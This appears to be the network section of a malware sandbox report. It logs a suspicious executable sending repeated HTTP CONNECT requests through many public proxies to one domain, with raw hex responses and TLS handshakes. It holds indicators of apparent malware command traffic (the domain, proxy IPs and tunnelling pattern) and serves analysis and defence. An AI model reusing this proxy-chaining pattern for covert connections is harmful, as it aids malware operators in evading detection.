                                                                                                      Feb 23, 2024 09:45:16.994611979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.070516109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366966009 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      199192.168.2.45054023.95.216.90156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.012787104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      200192.168.2.450174145.239.2.102154606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.012855053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.037420988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.146966934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147305965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.147177935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:53.146770000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:05.148479939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      201192.168.2.450223162.214.102.195567556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.018074989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      202192.168.2.45054124.249.199.441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.034898043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      203192.168.2.450118123.110.158.236806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.050632954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.401468992 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      204192.168.2.450133223.27.144.51806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.051430941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.341908932 CET101INHTTP/1.0 200 Connection Established
                                                                                                      Proxy-agent: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.12
                                                                                                      Feb 23, 2024 09:45:24.384444952 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 24 6b bd 1b ca 77 8b cd 61 83 08 07 e3 68 83 be 96 cc 08 e9 b3 4e 81 67 64 9e 35 e8 67 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[$kwahNgd5g*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#dW&?qcr"[I_M}
                                                                                                      Feb 23, 2024 09:45:24.814999104 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 24 af 43 d0 95 06 cc 09 ab d5 50 92 4c 34 cf 53 2c 4b 2e 17 e9 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[$CPL4S,K.DOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:24.815016031 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                                      Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                                      Feb 23, 2024 09:45:24.815047979 CET832INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                                      Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                                      Feb 23, 2024 09:45:24.815113068 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                                      Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                                      Feb 23, 2024 09:45:24.818218946 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 7f d6 8c ef 63 6a 65 ee 01 d1 e5 9f fd 51 ba c1 38 6c f0 00 52 5e 8e 9f f1 29 b8 7d ad 75 72 6f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0d 74 81 ec b6 e1 b0 8b 0d f5 69 47 7c 7f 3c 29 0e ca 00 03 04
                                                                                                      Data Ascii: %! cjeQ8lR^)}uro(tiG|<)t91*14
                                                                                                      Feb 23, 2024 09:45:25.237131119 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 3b ec ea 22 b9 7a a8 ed aa b5 49 1a 40 dd fc 8d 1b 84 28 91 24 10 a5 6d 65 0a 5e 61 6f 26 28 2b 75 86 04 48 ce e6 b3 e1 f9 94 06 6e 73 b5 38 11 63 49 e0 b3 37 d6 a5 30 cf c6 b1 4d 0d 3a ed b7 70 bc e4
                                                                                                      Data Ascii: ;"zI@($me^ao&(+uHns8cI70M:pbWaWF(RK\i5A<:)<sH5l[L7J=|Mbab1^dsw50M#RLp?yL"(Fq?LuZ(s$Tr7AK'<
                                                                                                      Feb 23, 2024 09:45:25.255279064 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 0c 2a a4 9d 9c 42 19 41 13 5a 01 55 08 d6 79 2c 39 14 9a 3d aa 77 ac 60 f0 04 b3 ef 9b 4b 05 a9 07 ff 04 51 1c 17 b7 27 ef 94 25 5e ee ba 32 60 78 52 39 b6 c6 97 77 cc b2 7e f6 6b 34 fb 5d 0e d2 cd f8 c2 5e
                                                                                                      Data Ascii: *BAZUy,9=w`KQ'%^2`xR9w~k4]^8`Bs*][I+ C,^=\r~z.n"f@
                                                                                                      Feb 23, 2024 09:45:25.895678997 CET1286INData Raw: 43 d6 7a cd 3f 21 d0 11 85 55 b5 46 a0 75 29 db bd a2 b3 ff 34 ef 48 33 a8 51 1c 46 d9 5a c9 b6 f2 4b 1b c0 1c 49 df dd 4e 23 9b 8a b6 14 bf 19 50 c9 29 b4 36 8f d0 e2 57 7c 7c c4 e2 b1 e7 d1 4d d1 cd af 91 86 fa 58 81 0c d2 6f 1d 7c 6a 57 1b 60
                                                                                                      Data Ascii: Cz?!UFu)4H3QFZKIN#P)6W||MXo|jW`-_'f~K|Op4b2eqhKfP_eBf>*_|xik;eUDFg;)/M]\<V1pXO4-<|.\_Z`%*KIf=o
                                                                                                      Feb 23, 2024 09:45:25.895705938 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 cc 85 5f 5d 9c bd 90 10 fe 73 f6 ed a6 5c d2 19 f5 4d 7a d9 91 a6 5b e2 8c 71 06 01 48 5b 44 a2 8e 2e 2f ec 67 43 21 9c 39 fc b3 c6 29 ef 7e b4 45 d9 91 dd 21 5f 42 a0 3b f1 04 22 e8 fa 20 08 76 79 e8 d2 22
                                                                                                      Data Ascii: q_]s\Mz[qH[D./gC!9)~E!_B;" vy"BEXoAF3.o5Z;T1c|M+1fD|JnaO>^}Iw^"M]-JY<uCC_Ccdu^g&M1V0ewnp'dz


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      205192.168.2.45054289.161.90.20356786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.061695099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      206192.168.2.450537184.181.217.20141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.064090014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      207192.168.2.45026177.68.111.7331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.069013119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.070540905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.178627014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.178551912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.178575039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.337130070 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      208192.168.2.450267152.228.134.212321486812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.082673073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.146814108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.147272110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147352934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.147187948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      209192.168.2.45025998.170.57.23141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.091265917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      210192.168.2.45024083.219.145.10631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.109455109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.345748901 CET202INHTTP/1.0 403 Forbidden
                                                                                                      Content-Length: 811
                                                                                                      Content-Type: text/html
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Expires: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      211192.168.2.4505455.196.111.30204816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.151170015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      212192.168.2.450539211.222.252.187806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.154321909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      213192.168.2.450328174.77.111.19641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.164530993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      214192.168.2.45051574.119.147.20941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.188745022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      215192.168.2.450549157.185.161.100265896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.195597887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      216192.168.2.450320109.205.181.2724196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.206692934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.256530046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.284276009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292638063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.350065947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      217192.168.2.45055087.106.114.12460056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.222187996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      218192.168.2.450538202.162.219.1210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.256226063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      219192.168.2.450546122.116.150.290006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.282514095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      220192.168.2.450520199.102.107.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.286015034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      221192.168.2.45040351.210.45.148111766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.300591946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.439716101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537626028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.537802935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.537961960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:53.537386894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:05.537384987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      222192.168.2.450569104.20.125.124806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:17.303832054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.391217947 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
